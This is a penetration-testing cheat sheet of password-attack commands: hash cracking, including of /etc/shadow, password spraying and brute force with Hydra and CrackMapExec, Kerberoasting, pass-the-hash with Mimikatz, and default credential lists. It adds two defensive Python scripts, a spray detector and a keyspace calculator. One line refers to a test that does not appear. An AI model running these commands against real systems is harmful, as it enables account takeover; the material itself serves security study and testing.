# Password Attacks

Attacking authentication mechanisms using discovered or captured credentials. For finding exposed credentials in repositories and code, see Credential Hunting.
## Hash Cracking

### John the Ripper

```bash
# Crack with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Crack specific hash type
john --format=NT --wordlist=rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Incremental mode
john --incremental hashes.txt

# Rules
john --wordlist=rockyou.txt --rules hashes.txt

# Crack shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=rockyou.txt unshadowed.txt
```
### Hashcat

```bash
# Crack MD5
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# Crack NTLM
hashcat -m 1000 -a 0 hashes.txt rockyou.txt

# Crack with rules
hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule

# Brute force (mask attack)
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a

# Show cracked
hashcat -m 0 hashes.txt --show

# Common hash modes:
# 0     = MD5
# 100   = SHA1
# 1000  = NTLM
# 1400  = SHA256
# 1700  = SHA512
# 1800  = sha512crypt
# 3200  = bcrypt
# 13100 = Kerberos 5 TGS-REP
```
## Password Spraying

### CrackMapExec

```bash
# SMB password spray
crackmapexec smb target.com -u users.txt -p 'Password123'

# Multiple passwords
crackmapexec smb target.com -u users.txt -p passwords.txt

# Keep going after a valid login is found instead of stopping at the first success
crackmapexec smb target.com -u users.txt -p 'Password123' --continue-on-success
```
### Hydra

```bash
# HTTP POST
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

# SSH
hydra -L users.txt -P passwords.txt ssh://target.com

# FTP
hydra -L users.txt -P passwords.txt ftp://target.com

# SMB
hydra -L users.txt -P passwords.txt smb://target.com

# RDP
hydra -L users.txt -P passwords.txt rdp://target.com

# MySQL
hydra -L users.txt -P passwords.txt mysql://target.com
```
### Kerbrute

```bash
# User enumeration
./kerbrute userenum -d domain.local --dc dc.domain.local users.txt

# Password spray
./kerbrute passwordspray -d domain.local --dc dc.domain.local users.txt 'Password123'

# Brute force
./kerbrute bruteuser -d domain.local --dc dc.domain.local passwords.txt username
```
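From the defensive side, every tool in this section leaves the same footprint in authentication logs: one source trying one or two passwords against many distinct accounts (spraying), or many passwords against one account (brute force). The script below is an added example, not part of the original cheat sheet or of any of the tools above. It parses a constructed, simplified log format (`<ISO timestamp> <source IP> <account> <SUCCESS|FAIL>`, an assumption standing in for SMB, SSH or Kerberos pre-authentication failures) and flags sources whose failures inside a sliding time window match either pattern, listing any successful logins from a flagged source so those accounts can be reset first.

```python
"""Flag password-spraying and brute-force patterns in authentication logs.

Added illustrative example (not code from the original page). The log
format is a constructed stand-in; map your real source (Windows 4625/4771
events, sshd failures, etc.) onto the same (time, source, account, outcome)
tuple and the analysis is unchanged.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp> <source IP> <account> <SUCCESS|FAIL>".
# 10.0.0.5 sprays six accounts and gets one hit, 10.0.0.9 hammers one
# account, 192.168.1.20 is a user who mistyped their password twice.
SAMPLE_LOG = """\
2024-03-01T09:00:01 10.0.0.5 alice FAIL
2024-03-01T09:00:03 10.0.0.5 bob FAIL
2024-03-01T09:00:04 10.0.0.5 carol SUCCESS
2024-03-01T09:00:06 10.0.0.5 dave FAIL
2024-03-01T09:00:07 10.0.0.5 erin FAIL
2024-03-01T09:00:09 10.0.0.5 frank FAIL
2024-03-01T09:00:10 10.0.0.5 grace FAIL
2024-03-01T09:01:00 10.0.0.9 dave FAIL
2024-03-01T09:01:01 10.0.0.9 dave FAIL
2024-03-01T09:01:02 10.0.0.9 dave FAIL
2024-03-01T09:01:03 10.0.0.9 dave FAIL
2024-03-01T09:01:04 10.0.0.9 dave FAIL
2024-03-01T09:01:05 10.0.0.9 dave FAIL
2024-03-01T09:05:00 192.168.1.20 heidi FAIL
2024-03-01T09:05:20 192.168.1.20 heidi FAIL
2024-03-01T09:05:40 192.168.1.20 heidi SUCCESS
"""


def parse_events(text):
    """Parse log text into a time-sorted list of (ts, src, account, outcome)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, account, outcome = line.split()
        events.append((datetime.fromisoformat(ts), src, account, outcome))
    events.sort()
    return events


def analyze(events, window=timedelta(minutes=10), spray_accounts=5, brute_attempts=5):
    """Return {source: finding} for sources whose failures match spray or brute-force patterns.

    spray      : >= spray_accounts distinct accounts failed from one source within `window`
    bruteforce : >= brute_attempts failures against a single account from one source within `window`
    """
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        fails = [(ts, acct) for ts, _, acct, outcome in evs if outcome == "FAIL"]
        kinds = set()
        left = 0
        # Sliding window over this source's failures, oldest to newest.
        for right in range(len(fails)):
            while fails[right][0] - fails[left][0] > window:
                left += 1
            in_window = fails[left:right + 1]
            distinct = {acct for _, acct in in_window}
            if len(distinct) >= spray_accounts:
                kinds.add("spray")
            per_account = defaultdict(int)
            for _, acct in in_window:
                per_account[acct] += 1
            if per_account and max(per_account.values()) >= brute_attempts:
                kinds.add("bruteforce")
        if not kinds:
            continue
        findings[src] = {
            "kinds": sorted(kinds),
            "failed_accounts": sorted({acct for _, acct in fails}),
            # Any success from a flagged source is the account to lock and reset first.
            "successes": sorted({acct for _, _, acct, outcome in evs if outcome == "SUCCESS"}),
        }
    return findings


if __name__ == "__main__":
    for src, finding in analyze(parse_events(SAMPLE_LOG)).items():
        print(src, finding)
```

The thresholds are deliberately parameters: lockout policy, help-desk reset volume and the size of the user base decide what counts as suspicious, and the second assertion in the test shows that a window too narrow for the attacker's pacing hides both patterns entirely.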
## Kerberoasting

```bash
# Request TGS tickets (Impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.10 -request

# Save to file
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile kerberoast.txt

# Crack with hashcat
hashcat -m 13100 kerberoast.txt rockyou.txt
```

PowerView:

```powershell
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
```
## AS-REP Roasting

```bash
# Get AS-REP hashes (Impacket), no credentials needed; output defaults to hashcat format
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -outputfile asrep.txt

# With credentials
impacket-GetNPUsers domain.local/user:password -dc-ip 10.10.10.10 -outputfile asrep.txt

# Crack with hashcat
hashcat -m 18200 asrep.txt rockyou.txt
```
## Pass-the-Hash

```bash
# Impacket psexec (-hashes takes LMHASH:NTHASH; the LM half may be left empty)
impacket-psexec -hashes :NTHASH administrator@target.com

# CrackMapExec
crackmapexec smb target.com -u administrator -H NTHASH

# Evil-WinRM
evil-winrm -i target.com -u administrator -H NTHASH
```

Mimikatz:

```
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:NTHASH /run:cmd
```
## Pass-the-Ticket

```
# Export tickets (Mimikatz)
sekurlsa::tickets /export

# Import ticket
kerberos::ptt ticket.kirbi

# List tickets
klist
```
## Default Credentials

### Common Defaults

```
admin:admin
admin:password
root:root
root:toor
administrator:administrator
tomcat:tomcat
admin:Admin123
admin:Password123
```

### Online Resources
## Wordlist Generation

### CeWL

```bash
# Generate wordlist from website
cewl http://target.com -w wordlist.txt

# Minimum word length
cewl http://target.com -m 6 -w wordlist.txt

# Include email addresses
cewl http://target.com -e -w wordlist.txt
```
### Crunch

```bash
# Generate wordlist from a pattern (-t placeholders)
crunch 8 8 -t @@@@%%%% -o wordlist.txt
# @ = lowercase
# , = uppercase
# % = numbers
# ^ = symbols

# Generate all 6- to 8-digit strings from a character set
crunch 6 8 0123456789 -o numbers.txt

# Generate with specific characters
crunch 4 4 abcd123 -o wordlist.txt
```
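The hashcat mask in the Hashcat section (`?a?a?a?a?a?a`) and the crunch `-t` pattern above (`@@@@%%%%`) both describe a keyspace, and the size of that keyspace is what decides whether a password policy survives an offline attack against a leaked hash. The calculator below is an added example, not part of the cheat sheet or of either tool: it parses both syntaxes, computes the number of candidates, and converts that to time at a given hash rate so a defender can compare, say, an 8-character policy against the per-algorithm rates their own hardware benchmarks report. Charset sizes follow hashcat's built-in sets (`?l`/`?u` 26, `?d` 10, `?s` 33, `?a` 95, `?b` 256); crunch's `^` symbol set is assumed to be the same 33 printable symbols.

```python
"""Keyspace and time-to-exhaust for hashcat masks and crunch -t patterns.

Added example, not code from the page or from hashcat/crunch. The hashcat
charset sizes are the tool's documented built-ins; the crunch symbol count
(33) is an assumption made here for comparability.
"""

# hashcat built-in charsets: ?l ?u ?d ?s ?a ?b
HASHCAT_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}

# crunch -t placeholders: @ lowercase, , uppercase, % digits, ^ symbols (assumed 33)
CRUNCH_PLACEHOLDERS = {"@": 26, ",": 26, "%": 10, "^": 33}


def hashcat_mask_keyspace(mask):
    """Number of candidates a hashcat -a 3 mask generates.

    '?x' selects a built-in charset, '??' is a literal '?', and any other
    character is a fixed literal contributing a factor of 1.
    """
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            tag = mask[i + 1]
            if tag != "?":  # '??' is an escaped literal question mark
                if tag not in HASHCAT_CHARSETS:
                    raise ValueError(f"unknown charset ?{tag}")
                total *= HASHCAT_CHARSETS[tag]
            i += 2
        else:
            i += 1
    return total


def crunch_pattern_keyspace(pattern):
    """Number of candidates for a crunch -t pattern; non-placeholder characters are literals."""
    total = 1
    for ch in pattern:
        total *= CRUNCH_PLACEHOLDERS.get(ch, 1)
    return total


def seconds_to_exhaust(keyspace, hashes_per_second):
    """Worst-case time to try every candidate at the given rate."""
    if hashes_per_second <= 0:
        raise ValueError("rate must be positive")
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # Rates below are placeholders for whatever `hashcat -b` reports on your hardware.
    for label, ks in [("?a?a?a?a?a?a", hashcat_mask_keyspace("?a?a?a?a?a?a")),
                      ("@@@@%%%%", crunch_pattern_keyspace("@@@@%%%%"))]:
        print(f"{label}: {ks:,} candidates, "
              f"{seconds_to_exhaust(ks, 1e9) / 3600:.2f} h at 1e9 H/s, "
              f"{seconds_to_exhaust(ks, 1e4) / 86400:.1f} days at 1e4 H/s")
```

The two rates in the usage block illustrate the point the hash-mode list makes implicitly: the same keyspace that is hours for a fast unsalted hash such as MD5 or NTLM is years for a deliberately slow one such as bcrypt, so the algorithm protecting a stored hash matters as much as the policy behind the password.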